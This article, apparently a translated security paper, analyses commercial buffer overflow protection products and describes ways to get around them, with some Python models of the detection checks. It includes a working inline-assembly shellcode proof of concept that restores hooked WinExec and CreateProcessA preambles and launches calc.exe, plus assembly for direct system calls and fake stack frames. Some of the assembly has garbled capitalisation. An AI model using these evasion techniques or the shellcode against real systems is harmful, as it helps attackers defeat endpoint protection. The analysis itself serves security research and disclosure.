Bypassing Buffer Overflow Protection Systems

-- [1-Introduction
Recently, several commercial security vendors have begun offering products that claim to solve the buffer overflow problem. This article analyzes these protection schemes and presents techniques for bypassing them.

Vendors have developed a number of technologies to prevent buffer overflows. Currently the most popular is stack backtracing, which is the easiest protection to implement but also the easiest for an attacker to bypass.

Notably, several well-known commercial products, such as Entercept and Okena, use this technology.

-- [2-Stack backtracing
Most existing commercial security systems do not actually prevent buffer overflows; instead, they attempt to detect the execution of shellcode.

The most common technique for detecting shellcode is code page permission checking: the system checks whether code is executing from a writable memory page. This works because code sections are normally not writable, and it is needed because the x86 page tables of the time have no non-executable attribute bit.

Some overflow protection systems perform additional checks, such as verifying that the code's memory page belongs to a memory-mapped section of a PE file rather than to an anonymous memory section.

[-----------------------------------------------------------]

page = get_page_from_addr(code_addr);
if (page->permissions & WRITABLE)
    return BUFFER_OVERFLOW;

ret = page_originates_from_file(page);
if (ret != TRUE)
    return BUFFER_OVERFLOW;

[-----------------------------------------------------------]
Pseudo code for code page permission checking
Buffer overflow protection technologies (BOPT) that rely on stack backtracing do not actually create a non-executable stack segment; instead, they monitor for shellcode execution by hooking operating system calls.
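
The page permission check in the pseudocode above can be modeled in a few lines of Python. This is only a sketch: the `Page` record, the `PAGES` table, and the decision to treat an unmapped address as an overflow are assumptions made for illustration, not details of any product.

```python
from dataclasses import dataclass
from typing import List, Optional

BUFFER_OVERFLOW = "buffer_overflow"
OK = "ok"


@dataclass(frozen=True)
class Page:
    base: int
    size: int
    writable: bool
    backing_file: Optional[str]  # None models an anonymous mapping


def get_page_from_addr(pages: List[Page], addr: int) -> Optional[Page]:
    """Return the page that contains addr, or None if it is unmapped."""
    for page in pages:
        if page.base <= addr < page.base + page.size:
            return page
    return None


def check_code_page(pages: List[Page], code_addr: int) -> str:
    page = get_page_from_addr(pages, code_addr)
    # Assumption: an unmapped address is treated like a writable one.
    if page is None or page.writable:
        return BUFFER_OVERFLOW
    # Second check: the page must originate from a file-backed section.
    if page.backing_file is None:
        return BUFFER_OVERFLOW
    return OK


# Hypothetical address space used only for this illustration.
PAGES = [
    Page(0x00400000, 0x1000, writable=False, backing_file="app.exe"),
    Page(0x0012F000, 0x1000, writable=True, backing_file=None),   # stack
    Page(0x00A00000, 0x1000, writable=False, backing_file=None),  # anonymous
]
```

With this table, an address inside the `app.exe` page passes, while addresses on the stack page or in the anonymous read-only page are reported as overflows.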

On most operating systems, calls can be hooked in either user mode or kernel mode.

The next section describes how to evade kernel hooks, and the section after it describes how to bypass user-mode hooks.

-- [3-Evading kernel hooks
When hooking in the kernel, a host intrusion prevention system (HIPS) must be able to determine where in user mode an API call originated.

Because functions in kernel32.dll and ntdll.dll are used so heavily, an API call is usually separated from the actual system call trap by many stack frames. For this reason, some intrusion prevention systems rely on stack backtracing to locate the original caller of a system call.

-- [3.1-Kernel stack backtracing
Although stack backtracing can be done in either user mode or kernel mode, it is far more important to the kernel components of a BOPT than to the user-mode components. Existing commercial BOPT kernel components rely entirely on stack backtracing to detect shellcode execution. Evading kernel hooks therefore reduces to defeating the stack backtracing mechanism.

Stack backtracing involves traversing the stack frames and passing each return address to the buffer overflow detection routine.

There is usually an additional "return into libc" check, which verifies that a return address points to the instruction immediately following a call or jmp. The basic stack backtracing code used by a BOPT typically looks like the following:
[-----------------------------------------------------------]

while (is_valid_frame_pointer(ebp)) {
    ret_addr = get_ret_addr(ebp);

    if (check_code_page(ret_addr) == BUFFER_OVERFLOW)
        return BUFFER_OVERFLOW;

    if (does_not_follow_call_or_jmp_opcode(ret_addr))
        return BUFFER_OVERFLOW;

    ebp = get_next_frame(ebp);
}

[-----------------------------------------------------------]
Pseudo code for bopt stack backtracing
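
As a rough illustration of the loop above, the following Python sketch walks a simulated EBP chain. The stack is a dictionary of 32-bit words, `readonly_code` stands in for the code page check, and `call_sites` stands in for the "follows a call or jmp" check. All addresses and names are made up for the example.

```python
BUFFER_OVERFLOW = "buffer_overflow"
OK = "ok"


def backtrace(stack, ebp, readonly_code, call_sites, max_frames=64):
    """Walk saved-EBP links and validate each return address.

    stack         -- dict mapping stack addresses to 32-bit words
    readonly_code -- range of addresses treated as file-backed, read-only code
    call_sites    -- set of addresses that immediately follow a call/jmp
    """
    frames = 0
    # A frame pointer is "valid" here if both of its slots are on the stack.
    while ebp in stack and ebp + 4 in stack and frames < max_frames:
        ret_addr = stack[ebp + 4]          # return address sits above saved EBP
        if ret_addr not in readonly_code:  # code page permission check
            return BUFFER_OVERFLOW
        if ret_addr not in call_sites:     # "return into libc" check
            return BUFFER_OVERFLOW
        ebp = stack[ebp]                   # follow the saved EBP to the next frame
        frames += 1
    return OK


# Hypothetical layout: two frames whose return addresses follow call sites.
CODE = range(0x00401000, 0x00402000)
CALL_SITES = {0x00401005, 0x00401020}
LEGIT = {
    0x0012FF00: 0x0012FF20, 0x0012FF04: 0x00401005,
    0x0012FF20: 0x00000000, 0x0012FF24: 0x00401020,
}

# Same stack, but the outer return address now points into the stack itself.
SMASHED = dict(LEGIT)
SMASHED[0x0012FF24] = 0x0012FF80

# Same stack, but the outer return address lands mid-function in real code.
RET_INTO_CODE = dict(LEGIT)
RET_INTO_CODE[0x0012FF24] = 0x00401010
```

The walk accepts `LEGIT` and rejects the other two. Note that it simply stops when the saved EBP no longer points at a valid frame, which is the property the rest of this section relies on.
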
To understand how stack backtracing can be evaded, it is essential to understand how it works on x86. When one function calls another, a typical stack layout looks like the following:

:                         :
|-------------------------|
| Function B parameter #2 |
|-------------------------|
| Function B parameter #1 |
|-------------------------|
| Return EIP address      |
|-------------------------|
| Saved EBP               |
|=========================|
| Function A parameter #2 |
|-------------------------|
| Function A parameter #1 |
|-------------------------|
| Return EIP address      |
|-------------------------|
| Saved EBP               |
|-------------------------|
The EBP register points to the current frame's saved EBP, which in turn points to the next stack frame. Without EBP, it is very difficult, if not impossible, to correctly identify and walk all of the stack frames.

Modern compilers often omit the frame pointer and use EBP as a general-purpose register instead. With this optimization, a stack frame looks as follows:

|-----------------------|
| Function parameter #2 |
|-----------------------|
| Function parameter #1 |
|-----------------------|
| Return EIP address    |
|-----------------------|
Note that no saved EBP appears on the stack. Without it, the buffer overflow detection technology cannot walk the stack accurately, which makes detection difficult: a simple "return into libc" style attack can bypass the protection.

Simply calling an API that sits at a lower level than the API hooked by the BOPT also defeats this detection technique.

-- [3.2-Faking stack frames

Because the stack is entirely under the shellcode's control, its contents can be changed at will before an API call. Specially crafted stack frames can be used to slip past buffer overflow detection.

As explained above, the buffer overflow detector looks for three key indicators of legitimate code: read-only page permissions, a memory-mapped file section, and a return address that points to the instruction immediately after a call or jmp. Because function pointers change calling semantics, a BOPT does not (and cannot) check that the call or jmp actually targets the API being called. Most importantly, the BOPT cannot check return addresses beyond the last valid EBP frame pointer (it cannot backtrace any further).

A BOPT can therefore be evaded by creating a "final" stack frame with a valid return address. This return address must point to an instruction that resides in a read-only, memory-mapped file section and immediately follows a call or jmp. Provided that the dummy return address is reasonably close to a second return address, the shellcode can easily regain control.

The ideal instruction sequence for the dummy return address to point to is:
[-----------------------------------------------------------]

jmp [eax]           ; or call [eax], or another register
dummy_return: ...   ; some number of nops or easily
                    ; reversed instructions, e.g. inc eax
ret                 ; any return will do, e.g. ret 8

[-----------------------------------------------------------]
Kernel BOPT components are easy to bypass because they must rely on user-controlled data (the stack) to validate API calls. By manipulating the stack appropriately, shellcode can cut the return address analysis short.

This stack backtracing evasion technique is also effective against user-mode hooks.

-- [4-Evading user-mode hooks
Given the right instruction sequence in a valid region of memory, kernel buffer overflow protection can be bypassed. Similar techniques can be used against user-mode BOPT components. More importantly, because shellcode runs with the same privileges as the user-mode hooks, many other techniques are also available for evading BOPT monitoring.

-- [4.1-Implementation problems - incomplete API hooking
User-mode buffer overflow protection has many problems. For example, attackers can choose among many different ways to reach their goal, while the protection system may detect only some of them.

It is very difficult, if not impossible, to predict how an attacker will construct shellcode. Choosing what to hook is not easy, and there are many pitfalls, such as:
a. Not taking both the Unicode and ANSI versions of an API into account.
b. Not following the chaining nature of API calls. For example, many functions in kernel32.dll are thin wrappers around functions in ntdll.dll.
c. The constantly changing nature of the Microsoft Windows API.

-- [4.1.1-Not hooking all API versions
A common mistake in user-mode hooking is incomplete code path coverage. To be effective against malicious code, every API an attacker could use must be hooked, which requires the protection system to hook some point along every code path the attacker must take. However, as shown below, once an attacker has begun executing code, it is very hard for a third-party protection system to cover all of the attacker's options. In fact, none of the commercial protection systems we tested covered the attacker's code paths effectively.

Many Windows APIs come in two versions, ANSI and Unicode. ANSI function names usually end in A and Unicode function names in W. The ANSI functions are generally thin wrappers around their Unicode counterparts. For example, CreateFileA is an ANSI function: it converts its string parameters to Unicode and then calls CreateFileW. Unless both the ANSI and Unicode versions of an API are hooked, an attacker can bypass the protection by calling the other version.

For example, Entercept 4.1 hooks LoadLibraryA but neglects to hook LoadLibraryW. If a protection system hooks only one version of an API, it should be the Unicode version. Okena/CSA does better here: it hooks LoadLibraryA, LoadLibraryW, LoadLibraryExA, and LoadLibraryExW. Unfortunately for third-party overflow protection systems, hooking a handful of kernel32.dll functions is not enough.
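
The reasoning for preferring the Unicode version can be shown with a toy model. The `Api` class below is purely hypothetical: it mimics an ANSI wrapper that converts its argument and forwards to the Unicode function, and records which hooked entry points were actually reached.

```python
class Api:
    """Toy model of an A/W function pair; not a real Windows binding."""

    def __init__(self, hooked):
        self.hooked = set(hooked)  # names of the entry points being monitored
        self.log = []              # hooked entry points that were reached

    def _enter(self, name):
        if name in self.hooked:
            self.log.append(name)

    def load_library_w(self, path: str) -> str:
        self._enter("LoadLibraryW")
        return "module:" + path.lower()

    def load_library_a(self, path: bytes) -> str:
        self._enter("LoadLibraryA")
        # The ANSI version converts its argument and calls the Unicode version.
        return self.load_library_w(path.decode("ascii"))


# Hooking only the ANSI wrapper misses a direct call to the Unicode version.
ansi_only = Api(hooked={"LoadLibraryA"})
ansi_only.load_library_w("KERNEL32.DLL")

# Hooking only the Unicode version still observes calls made through the wrapper.
unicode_only = Api(hooked={"LoadLibraryW"})
unicode_only.load_library_a(b"KERNEL32.DLL")
```

In the first case the log stays empty; in the second the hook still fires, because every call through the wrapper ends up in the Unicode function.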

-- [4.1.2-Not hooking deeply enough
In Windows NT, kernel32.dll is largely a thin wrapper around ntdll.dll, yet most overflow protection systems do not hook functions in ntdll.dll. This mistake is similar to not hooking both versions of an API. An attacker can call ntdll.dll functions directly and bypass every check placed in kernel32.dll.

For example, NAI Entercept tries to detect shellcode calling GetProcAddress() in kernel32.dll. However, shellcode can be rewritten to call LdrGetProcedureAddress() in ntdll.dll, which achieves the same goal and avoids detection.

More generally, shellcode can avoid user-mode hooks altogether and reach its goal by issuing system calls directly (see section 4.5).

-- [4.1.3-Not hooking thoroughly enough
The interactions between the various Win32 APIs are complex and hard to understand. A vendor can easily leave an opening for an attacker by accident.

For example, both Okena/CSA and NAI Entercept hook WinExec to prevent an attacker from spawning a process. The WinExec call path is as follows:
WinExec() --> CreateProcessA() --> CreateProcessInternalA()

Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() (see Appendix A). However, neither product hooks CreateProcessInternalA(), which is exported by kernel32.dll. When writing shellcode, an attacker can call CreateProcessInternalA() instead of WinExec().

CreateProcessA() pushes two NULLs onto the stack before calling CreateProcessInternalA(). Shellcode therefore only needs to push two NULLs and then call CreateProcessInternalA() directly to avoid the user-mode hooks of both products.

As new DLLs and APIs are released, the interactions between Win32 APIs grow more complex, which compounds the problem. Third-party vendors are at a severe disadvantage when implementing overflow protection, and a single small mistake can be exploited by an attacker.

-- [4.2-Fun with trampolines
Most Win32 API functions begin with the same preamble: EBP is pushed onto the stack, and then ESP is copied into EBP.
[-----------------------------------------------------------]

Code Bytes      Assembly
55              push ebp
8bec            mov ebp, esp

[-----------------------------------------------------------]
Both Okena/CSA and Entercept use inline function hooking: they overwrite the first five bytes of a function with a jmp or call instruction. Below are the first few bytes of WinExec after it has been hooked.
[-----------------------------------------------------------]

Code Bytes      Assembly
e8 xx           call xxxxxxxx
54              push esp
53              push ebx
56              push esi
57              push edi

[-----------------------------------------------------------]
Alternatively, the first few bytes are replaced with a jmp.

[-----------------------------------------------------------]

Code Bytes      Assembly
e9 xx           jmp xxxxxxxx
...

[-----------------------------------------------------------]
Code can therefore easily check whether a function is hooked before calling it. If a protection system is present, shellcode can fall back on other techniques to get around the hook.
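
The check itself amounts to looking at the first opcode byte. The sketch below classifies a buffer holding the first bytes of a function, using the opcodes from the listings above (`e8` for call, `e9` for jmp, `55 8b ec` for the usual preamble). The function name and the returned labels are invented for this example; the same comparison is what an integrity checker would use to notice that a preamble has been patched.

```python
STANDARD_PREAMBLE = bytes.fromhex("558bec")  # push ebp; mov ebp, esp


def classify_preamble(code: bytes) -> str:
    """Classify the first bytes of a function as hooked, standard, or unknown."""
    if not code:
        raise ValueError("empty code buffer")
    if code[0] == 0xE8:                      # call rel32
        return "hooked-call"
    if code[0] == 0xE9:                      # jmp rel32
        return "hooked-jmp"
    if code.startswith(STANDARD_PREAMBLE):
        return "standard"
    return "unknown"


# Example buffers; the rel32 operands are placeholders, not real targets.
unhooked = bytes.fromhex("558bec83ec54")
call_hook = bytes.fromhex("e8000000005453")
jmp_hook = bytes.fromhex("e900000000")
```

A result of "unknown" only means the bytes match none of the three patterns; it says nothing about whether some other hooking method is in use.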

-- [4.2.1-Patch table jumping
When an API is hooked, the original first few bytes of the function are saved in a table so that the protection system can resume the original function once its checks are complete. This table is known as the patch table, and it resides somewhere in the process address space. When shellcode detects a hook, it can search for the patch table and call the original function through it. This avoids the hook entirely, even if the protection system monitors every possible code path.

-- [4.2.2-Hook hopping
Instead of locating the patch table, shellcode can carry its own copy of the original function preamble, execute it, and then jump into the API function just past the hook. Because Intel x86 instructions are variable-length, the jump must land on an instruction boundary:

[-----------------------------------------------------------]

ShellCode:
    call WinExecPreamble

WinExecPreamble:
    push ebp
    mov ebp, esp
    sub esp, 54
    jmp WinExec+6

[-----------------------------------------------------------]
This technique may not work if other functions along the call path are also hooked. Entercept also hooks CreateProcessA(), which WinExec() calls. To avoid detection, the shellcode must therefore also carry a copy of the CreateProcessA() preamble.

-- [4.3-Repatching Win32 APIs
If a user-mode overflow protection component makes fundamental implementation mistakes, even thorough hooking of the Win32 API does not help.

Some products make serious mistakes in how they implement their API hooks. To overwrite a function preamble, the code section of the DLL must first be made writable. Entercept marks the code sections of kernel32.dll and ntdll.dll writable so that it can modify them, but it never resets the writable bit!
Because of this serious flaw, an attacker can overwrite a hooked function with its original preamble. For the WinExec() and CreateProcessA() examples, this only requires overwriting the first six bytes of each function (six rather than five, to stay on an instruction boundary).
[-----------------------------------------------------------]
WinExecOverWrite:
Code Bytes      Assembly
55              push ebp
8bec            mov ebp, esp
83ec54          sub esp, 54

CreateProcessAOverWrite:
Code Bytes      Assembly
55              push ebp
8bec            mov ebp, esp
ff752c          push dword ptr [ebp+2c]
[-----------------------------------------------------------]
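
The six-byte figure follows from the instruction lengths in the listings above (1, 2, and 3 bytes): a five-byte patch ends in the middle of the third instruction, so the affected region has to be rounded up to the next instruction boundary. The helper below is a small sketch of that arithmetic; its name and the default patch size are assumptions for illustration.

```python
def bytes_to_cover(instruction_lengths, patch_size=5):
    """Return the smallest whole-instruction byte count that covers patch_size.

    instruction_lengths -- lengths, in bytes, of the instructions at the
                           start of the function, in order
    """
    total = 0
    for length in instruction_lengths:
        if total >= patch_size:
            break
        total += length
    if total < patch_size:
        raise ValueError("not enough instructions to cover the patch")
    return total


# push ebp (1) + mov ebp, esp (2) + a 3-byte third instruction
WINEXEC_LENGTHS = [1, 2, 3]
CREATEPROCESSA_LENGTHS = [1, 2, 3]
```

Both preambles from the listings come out at six bytes, matching the figure used in the text. Hooking libraries perform the same computation when deciding how many original bytes to save.
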
The example shellcode below is effective against NAI Entercept. It works by overwriting the function preambles.
[-----------------------------------------------------------]

// This sample code overwrites the preamble of WinExec and
// CreateProcessA to avoid detection. The code then
// calls WinExec with a "calc.exe" parameter.
// The code demonstrates that by overwriting function
// preambles, it is able to evade Entercept and Okena/CSA
// buffer overflow protection.

_ ASM {
Pusha

JMP jumpstart
Start:
Pop EBP
XOR eax, eax
MoV Al, 0x30
MoV eax, FS: [eax];
MoV eax, [eax + 0xc];

// We now have the module_item for NTDLL. dll
MoV eax, [eax + 0x1c]

// We now have the module_item for kernel32.dll
MoV eax, [eax]

// Image base of kernel32.dll
MoV eax, [eax + 0x8]

Movzx EBX, word PTR [eax + 3ch]

// PE. oheader. directorydata [Export = 0]
MoV ESI, [eax + EBX + 78 H]
Lea ESI, [eax + ESI + 18 h]

// EBX now has the base module address
MoV EBX, eax
Lodsd

// ECx now has the number of function names
MoV ECx, eax
Lodsd
Add eax, EBX

// EdX has addresses of functions
MoV edX, eax

Lodsd

// Eax has address of names
Add eax, EBX

// Save off the number of named Functions
// For later
Push ECx

// Save off the address of the Functions
Push edX

Resetexportnametable:
XOR edX, EDX

Initstringtable:
MoV ESI, EBP // beginning of string table
INC ESI

Movethroughtable:
MoV EDI, [eax + EDX * 4]
Add EDI, EBX // EBX has the process base address

XOR ECx, ECx
MoV Cl, byte PTR [EBP]
Test Cl, Cl
JZ donestringsearch

Stringsearch: // ESI points to the function string table
Repe cmpsb
Je found

// The number of named functions is on the stack
CMP [esp + 4], EDX
Je notfound
INC edX
JMP initstringtable
Found:
Pop ECx
SHL edX, 2
Add edX, ECx
MoV EDI, [edX]
Add EDI, EBX
Push EDI
Push ECx
XOR ECx, ECx
MoV Cl, byte PTR [EBP]
INC ECx
Add EBP, ECx
JMP resetexportnametable

Donestringsearch:
Overwritecreateprocessa:
Pop EDI
Pop EDI
Push 0x06
Pop ECx
INC ESI
Rep movsb

Overwritewinexec:
Pop EDI
Push EDI
Push 0x06
Pop ECx
INC ESI
Rep movsb

Callwinexec:
Push 0x03
Push ESI
Call [esp + 8]

Notfound:
Pop edX
Stringexit:
Pop ECx
Popa;
JMP exit

Jumpstart:
Add ESP, 0x1000
Call start
Winexec:
_ Emit 0x07
_ Emit 'W'
_ Emit 'I'
_ Emit 'n'
_ Emit 'E'
_ Emit 'X'
_ Emit 'E'
_ Emit 'C'
Createprocessa:
_ Emit 0x0e
_ Emit 'C'
_ Emit 'R'
_ Emit 'E'
_ Emit 'A'
_ Emit 'T'
_ Emit 'E'
_ Emit 'P'
_ Emit 'R'
_ Emit 'O'
_ Emit 'C'
_ Emit 'E'
_ Emit's'
_ Emit's'
_ Emit 'A'
Endoftable:
_ Emit 0x00

Winexecoverwrite:
_ Emit 0x06
_ Emit 0x55
_ Emit 0x8b
_ Emit 0xec
_ Emit 0x83
_ Emit 0xec
_ Emit 0x54
Createprocessaoverwrite:
_ Emit 0x06
_ Emit 0x55
_ Emit 0x8b
_ Emit 0xec
_ Emit 0xff
_ Emit 0x75
_ Emit 0x2c
Command:
_ Emit 'C'
_ Emit 'A'
_ Emit 'l'
_ Emit 'C'
_ Emit '.'
_ Emit 'E'
_ Emit 'X'
_ Emit 'E'
_ Emit 0x00

Exit:
_ Emit 0x90

// Normally call exitthread or something here
_ Emit 0x90
}

[-----------------------------------------------------------]

-- [4.4-Attacking user-mode components
Evading hooks is very effective against user-mode overflow protection components, but there are other good ways to avoid detection. Because the shellcode and the protection system run with the same privileges and in the same address space, shellcode can attack the protection system itself.

Essentially, attacking a buffer overflow protection system means subverting the mechanism it uses to detect shellcode execution.

Shellcode validation can work in only two basic ways:
1. The data to be checked is determined dynamically during each hooked API call, or
2. The data is gathered at process startup and then checked during each API call.
In either case, an attacker can subvert the process.

-- [4.4.1-IAT patching
Rather than implementing their own memory page attribute functions, commercial overflow protection systems usually rely on the API functions provided by the operating system. In Windows NT these are implemented in ntdll.dll and are imported into the user-mode component through its PE import table. An attacker can patch entries in that import table so that an API resolves to a function supplied by the shellcode. By supplying the function that the protection system uses for its validation checks, an attacker can easily avoid detection.

-- [4.4.2-Data section patching
For various reasons, an overflow protection system may use a pre-built list of page attributes. In that case, changing the address of VirtualQuery() (that is, replacing the function) is useless. To subvert the protection system, shellcode must locate and modify this list.

-- [4.5-Calling syscalls directly
As mentioned above, rather than going through ntdll.dll, an attacker can issue system calls directly from shellcode. This is effective against user-mode detection components, but it cannot bypass kernel-mode components.

To use this technique, you must understand how the kernel functions take their parameters, which may differ from the parameters of the corresponding kernel32.dll and ntdll.dll functions. You must also know the system call number. It can be obtained dynamically, in much the same way as a function address: once you have the address of the function in ntdll.dll, skip the first byte and read the following DWORD. This is the function's index in the system call table, a trick often used by rootkits.
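
The "skip one byte, read the following DWORD" step is plain byte parsing. The sketch below applies it to a byte buffer, assuming (consistent with the description above, but an assumption nonetheless) that the stub begins with `mov eax, imm32`, whose opcode is `b8`. The sample stub and the number `0xb7` are made up for the example.

```python
import struct


def syscall_number_from_stub(stub: bytes) -> int:
    """Extract the 32-bit immediate from a stub that starts with mov eax, imm32."""
    if len(stub) < 5:
        raise ValueError("stub too short")
    if stub[0] != 0xB8:  # assumed opcode: mov eax, imm32
        raise ValueError("stub does not start with mov eax, imm32")
    # Skip the opcode byte and read the little-endian DWORD that follows.
    return struct.unpack_from("<I", stub, 1)[0]


# Hypothetical stub bytes: mov eax, 0xb7 followed by unrelated bytes.
SAMPLE_STUB = bytes.fromhex("b8b70000008d5424")
```

Checking the opcode before reading the DWORD guards against the case where the stub has been patched, for example by an inline hook that replaced its first bytes with a jmp.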

The following pseudocode shows how NtReadFile can be called directly:

...
xor eax, eax

// Optional key
push eax
// Optional pointer to large integer with the file offset
push eax

push length_of_buffer
push address_of_buffer

// Before the call, make room for two DWORDs called the IoStatusBlock
push address_of_iostatusblock

// Optional ApcContext
push eax
// Optional ApcRoutine
push eax
// Optional Event
push eax

// Required file handle
push hfile

// EAX must contain the system call number
mov eax, found_sys_call_num

// EDX needs the address of the userland stack
lea edx, [esp]

// Trap into the kernel
// (recent Windows NT versions use "sysenter" instead)
int 2eh

-- [4.6-Faking stack frames
As discussed in section 3.2, kernel stack backtracing can be defeated by faking stack frames. Shellcode can create a stack frame with no saved EBP; because stack backtracing relies on the saved EBP to locate the next stack frame, such a fake frame stops the backtrace.

Of course, a fake stack frame is useless while EIP still points into shellcode residing in a writable memory segment. To get past the protection code, the shellcode must use a return address in non-writable memory. This creates a problem, because the shellcode must eventually regain control of execution.

To regain control, the shellcode returns through a borrowed "ret" instruction, which can be found by dynamically searching memory for the byte 0xC3.

The following is an example of a normal LoadLibrary("kernel32.dll") call.

push kernel32_string
call LoadLibrary

return_eip:

.
.
.

LoadLibrary:    ; * see below for a stack illustration

.
.
.
ret             ; return to stack-based return_eip

| ------------------------------ |
| Address of "kernel32.dll" str |
| ------------------------------ |
| Return address (return_eip) |
| ------------------------------ |
As explained earlier, the overflow protection code runs before LoadLibrary. Because the return address lies in writable memory, the system reports an overflow and terminates the target process.

The following code demonstrates the "ret" instruction technique:

push return_eip
push kernel32_string

; fake "call LoadLibrary" call
push address_of_ret_instruction
jmp LoadLibrary

return_eip:

.
.
.

LoadLibrary:    ; * see below for a stack illustration

.
.
.
ret             ; return to non stack-based address_of_ret_instruction

address_of_ret_instruction:

.
.
.
ret             ; return to stack-based return_eip
Once again the overflow protection code runs before LoadLibrary, but this time the return address saved on the stack lies in non-writable memory. There is also no saved EBP on the stack, so the protection code cannot backtrace to the next stack frame and check whether that frame's return address points into writable memory. LoadLibrary is therefore allowed to run, and it returns to the "ret" instruction. That ret pops the next return address off the stack and transfers EIP to it, handing control back to the caller.

| ------------------------------ |
| Return address (return_eip) |
| ------------------------------ |
| Address of "kernel32.dll" str |
| ------------------------------ |
| Address of "RET" Instruction |
| ------------------------------ |
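
The order in which the two returns consume the stack in the diagram above can be traced with a small model. The sketch below treats the stack as a Python list whose last element is the top of the stack, and models `ret N` as "pop the return address, then discard N more bytes". It assumes LoadLibrary removes its single argument on return (stdcall, equivalent to `ret 4`); all three addresses are made-up values.

```python
def ret(stack, extra_bytes=0):
    """Model x86 `ret N`: pop the return address, then drop N more bytes.

    stack is a list of 32-bit words; the last element is the top of the stack.
    """
    if extra_bytes % 4:
        raise ValueError("this model only handles whole 32-bit words")
    eip = stack.pop()
    for _ in range(extra_bytes // 4):
        stack.pop()
    return eip


# Hypothetical values standing in for the three entries in the diagram.
RETURN_EIP = 0x0012FF80        # caller's address, in writable memory
KERNEL32_STR = 0x0012FF60      # address of the "kernel32.dll" string
RET_INSTRUCTION = 0x77E61234   # address of a "ret" in read-only code

# Pushed in the same order as in the listing, so the last push is on top.
stack = [RETURN_EIP, KERNEL32_STR, RET_INSTRUCTION]

first_target = ret(stack, 4)   # LoadLibrary returns and removes its argument
second_target = ret(stack)     # the "ret" instruction then returns again
```

The first return lands on the "ret" instruction in read-only memory, and the second lands on return_eip, leaving the stack empty.
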
More complex fake stack frames can confuse the protection code even further.

The following example uses "ret 8" instead of "ret" to build the fake stack frames.
| -------------------------------- |
| Return address |
| -------------------------------- |
| Address of "RET" Instruction | <-fake frame 2
| -------------------------------- |
| Any value |
| -------------------------------- |
| Address of "kernel32.dll" str |
| -------------------------------- |
| Address of "RET 8" Instruction | <-fake frame 1
| -------------------------------- |
This causes an extra 32-bit value to be removed from the stack, making any analysis even more confusing.

-- [5-Summary
Currently, the major commercial overflow protection systems do not prevent stack overflows; they attempt to detect shellcode execution. The most common technique is code page permission checking, driven by stack backtracing.

Stack backtracing walks all the stack frames and checks whether their return addresses lie in writable memory. If one does, the call is treated as originating from shellcode.

This article has demonstrated several techniques for bypassing user-mode and kernel-mode overflow protection systems, ranging from tampering with function preambles to creating fake stack frames.

In short, the current mainstream overflow protection systems are flawed and provide a false sense of security. They offer little protection against a determined attacker.
